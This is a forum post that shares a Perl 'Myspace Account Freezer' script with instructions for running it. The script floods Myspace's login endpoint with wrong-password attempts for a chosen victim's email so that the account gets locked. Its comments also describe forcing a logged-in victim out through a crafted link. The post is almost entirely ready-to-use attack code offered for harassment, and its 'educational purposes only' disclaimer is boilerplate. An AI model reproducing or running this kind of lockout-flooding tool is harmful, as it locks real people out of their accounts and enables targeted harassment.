+ Reply to Thread
Results 1 to 1 of 1
  1. #1
    Join Date
    May 2008
    Posts
    196
    Points
    88,934.47
    Rep Power
    195

    Default Perl* Myspace Account Freezer

    I know myspace is old, so is this perl source....For those who dont know how to use it just download Strawberry perl or any other and just open the saved .pl file


    Code:
    #!/usr/bin/perl
    #
    # Myspace accounts remote DoS
    # Modded by: Solo
    # cheat-unit.info
    # 
    #
    #
    # Details:
    #
    # this vulnerability is similar to the one msn suffers from till now.
    #
    # more info see:
    #
    #
    #
    # in short vulnerability consists on sending a certain number of wrong
    # password attempts which makes the myspace stupid server block the
    # slave account instead of blocking the IP where from the attack
    # is coming from.
    #
    # The attack must start before the slave logs in, if the user is already
    # logged in then once they sign out they wont be able to sign back
    #
    # Or the slave can be logged out easly if the attacker get them
    # to click on a link, example:
    #
    # http://collect.myspace.com/index.cfm?fu ... d052b01234
    #
    # Myspace made it easier since MyToken can be anything or doesnt even need to be # sent
    #
    # That's it,
    #
    # Enjoy, from Solo.
    #
    # Disclaimer:
    #
    # this entire document and/or code is for eductional, testing and demonstrating
    # purpose only.
    # Modification use and/or publishing this information is entirely on
    # your OWN risk, I cannot be held responsible for anything on this entire document.
    
    use IO::Socket;
    
    if(!defined($ARGV[0])) {
    
    system (clear);
    print "\n";
    print "===================================================\n";
    print "--- Myspace accounts remote DoS modded by Solo\n";
    print "--- Contact: solohosting.us\n";
    print "--- Genex Security\n";
    print "===================================================\n";
    print "--- Usage: perl $0 <Target_Email>\n\n";
    
    exit; }
    
    # set these values to whatever the hell your mind tells you unless
    # you dont know what you are doing
    
    $TARGET = $ARGV[0];
    $PORT = "80";
    $SERVER = "login.myspace.com";
    $PASSWORD = "MyspaceSucks";
    $NUMBER = "999999999999999999999999999999999";
    
    #################################
    
    $A = "POST /index.cfm?fuseaction=login.process&MyToken=50b3f101-eadb-4043-bfc6-be6dbb69b12c HTTP/1.1";
    $B = "Host: login.myspace.com";
    $C = "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5";
    $D = "Connection: close";
    $E = "Content-Type: application/x-www-form-urlencoded";
    $G = "Login=&email=$TARGET&password=$PASSWORD&ctl00%24Main%24SplashDisplay%24loginold%24loginbutton.x=44&ctl00%24Main%24SplashDisplay%24loginold%24loginbutton.y=7";
    
    
    print "\n";
    print "===================================================\n";
    print "--- Myspace accounts remote DoS by simo_at_morx_org\n";
    print "--- Contact: simo_at_morx_dot_org\n";
    print "--- MorX Security Research Team http://www.MorX.org\n";
    print "===================================================\n";
    print "
    
    * Attacking $TARGET ...\n";
    
    print "[-] CTRL + C To Stop\n";
    
    for($count=0;$count<=$NUMBER;$count++)
    {
    $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$SERVER",PeerPort=>"$PORT")
    || die "Can't connect to $SERVER";
    print $remote "$A\n$B\n$C\n$D\n$E\nContent-Length: ". length($G) ."\n\n$G\n\n";
    $remote->autoflush();
    }
    
    print "Done";
    exit;
    Last edited by solowestside; 01-22-2011 at 07:16 PM.

+ Reply to Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts